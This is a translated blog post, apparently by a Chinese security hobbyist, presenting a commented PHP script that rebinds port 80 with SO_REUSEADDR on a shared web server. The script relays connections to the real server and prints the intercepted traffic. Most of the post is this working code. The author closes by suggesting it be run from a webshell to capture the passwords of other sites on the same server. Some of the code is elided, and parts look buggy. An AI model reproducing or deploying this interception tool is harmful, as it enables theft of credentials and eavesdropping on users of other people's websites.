Teach you how to sniff hijacked server data using PHP

A few days ago thorn forwarded to our mailing list an article by a foreign author; its main point is that PHP can be used to hijack and forward data. I took a look and it works, so today I set aside some time and wrote a piece of code to verify the idea. The original is a PDF; anyone interested can read it at http://www.secforce.co.uk/media/presentations/OWASP_Abusing_PHP_sockets.pdf. The principle itself is old: I remember that very early on, Flashsky described on xfocus how SO_REUSEADDR lets a port be bound repeatedly, and mix wrote a password sniffer that runs with guest privileges. What I compare here is the PHP implementation, which could be used from a webshell; of course I have not tested that, since I have no shell.

Note that this is completely different from the earlier "Port multiplexing/hijacking under PHP", which can be found at http://www.west999.com/info/html/wangluobiancheng/Phpbiancheng/20080224/22439.html. As for why it is different, I will not say.

The code is commented in detail, and I personally think it is well written, so I will not go through it line by line. Instead, here are a few technical difficulties. The first: in a web script there is neither multi-threading nor multi-processing, yet every new connection has to be handled. What to do? Clearly the work cannot be done sequentially, because accept() alone would block, and each subsequent session also needs to be handled separately. Fortunately, the manual shows that the classic socket_select function is available; it is the professional way to implement multiplexing in a single process.

The PHP code follows, with detailed comments. This is a blog post, so the code may have lost something along the way; I do not provide any other support. Read the code:
<?php
class Select
{
    public $sockets;

    // Constructor: seed the poll set with the given sockets
    function __construct($sockets)
    {
        $this->sockets = array();

        foreach ($sockets as $socket)
        {
            $this->add($socket);
        }
    }

    function add($add_socket)
    {
        $this->sockets[] = $add_socket;
    }

    // Delete an element by rebuilding the array through a temporary one
    function remove($remove_socket)
    {
        $tmp_sockets = array();

        foreach ($this->sockets as $socket)
        {
            if ($remove_socket != $socket)
            {
                $tmp_sockets[] = $socket;
            }
        }

        $this->sockets = $tmp_sockets;
    }

    // Check which sockets are readable within the given timeout; returns that subset of the socket array
    function can_read($timeout)
    {
        $read   = $this->sockets;
        $write  = null;   // socket_select() takes these by reference, so they must be real variables
        $except = null;
        socket_select($read, $write, $except, $timeout);
        return $read;
    }

    // Check which sockets are writable within the given timeout; returns that subset of the socket array
    function can_write($timeout)
    {
        $read   = null;
        $write  = $this->sockets;
        $except = null;
        socket_select($read, $write, $except, $timeout);
        return $write;
    }
}

// Do not let the page time out
set_time_limit(0);

// Output data immediately, without buffering
ob_end_clean();
ob_implicit_flush(true);

if (!isset($_GET["listen_ip"]))
{
    exit;
}
if ($_GET["listen_ip"] == "")
{
    exit;
}

$listen_ip   = $_GET["listen_ip"];
$listen_port = 80;

// Create the listening socket
$listen_sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

// Allow the port to be bound again even though it is already bound
socket_set_option($listen_sock, SOL_SOCKET, SO_REUSEADDR, 1);

// Bind explicitly to one IP address; the specific address takes precedence over the wildcard bind for incoming data
socket_bind($listen_sock, $listen_ip, $listen_port);

// Start listening
socket_listen($listen_sock);

echo "Listen on " . htmlentities($listen_ip) . ":" . $listen_port . "\n";

// The socket array that select() polls
$check_socks = array($listen_sock);

// Mapping between client sockets and server sockets:
// $socket_maps1 uses the client socket as key, $socket_maps2 uses the server socket as key.
// Two arrays cost a little memory but make the lookups below simple.
$socket_maps1 = array();
$socket_maps2 = array();

// .................................................................... (lines elided in the original post)
$select = new Select($check_socks);

while (true)
{
    /*
    print_r($socket_maps);
    print "\n";
    */
    // select() poll, timeout 1 second
    foreach ($select->can_read(1) as $socket)
    {
        // The listening socket is readable, meaning a client is connecting
        if ($socket == $listen_sock)
        {
            // Accept the new connection and add it to the poll set
            $new_client = socket_accept($listen_sock);
            $select->add($new_client);

            socket_getpeername($new_client, $ip, $port);
            echo "New client connected: $ip, $port\n";

            // Open a socket to the real server
            $server_sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            socket_connect($server_sock, "127.0.0.1", $listen_port);

            // Map the real server socket and the client socket to each other
            $socket_maps1[$new_client] = $server_sock;
            $socket_maps2[$server_sock] = $new_client;

            // Add to the select poll
            $select->add($server_sock);

            // $listen_sock was readable because of the new connection, which has now been handled.
            // Remove it for now; from here on only data forwarding is processed
            $select->remove($listen_sock);
        }
        // Any other readable socket means data needs to be relayed
        else
        {
            // Read the data; on failure (peer gone) remove the socket from the poll set and close it
            $client_data = @socket_read($socket, 1024, PHP_NORMAL_READ);
            if ($client_data === false || $client_data === "")
            {
                socket_close($socket);
                $select->remove($socket);
                echo "Client disconnected.\n";

                continue;
            }

            // If the socket is a key of $socket_maps1, the data was read from the client
            if (in_array($socket, array_keys($socket_maps1)))
            {
                // echo "readed from client.\n";
                if (!socket_write($socket_maps1[$socket], $client_data))
                {
                    socket_close($socket);
                    socket_close($socket_maps1[$socket]);
                    $select->remove($socket);
                    $select->remove($socket_maps1[$socket]);
                    print "Write to server error.\n";
                }
                print htmlentities($client_data) . "\n";
            }
            // If the socket is a key of $socket_maps2, the data was read from the real web server
            elseif (in_array($socket, array_keys($socket_maps2)))
            {
                // echo "readed from server.\n";
                if (!socket_write($socket_maps2[$socket], $client_data))
                {
                    socket_close($socket);
                    socket_close($socket_maps2[$socket]);
                    $select->remove($socket);
                    $select->remove($socket_maps2[$socket]);
                    print "Write to client error.\n";
                }
                print htmlentities($client_data) . "\n";
            }
        }
    }
}
?>
How to use this? That is up to you. Maybe you have a webshell but want to know the password of someone else's site on the same server ... I tested it on Windows XP + Apache; as far as I know, Windows 2003 does not allow re-binding an already bound port by default.

Detail Page: http://www.verydemo.com/demo_c116_i115729.html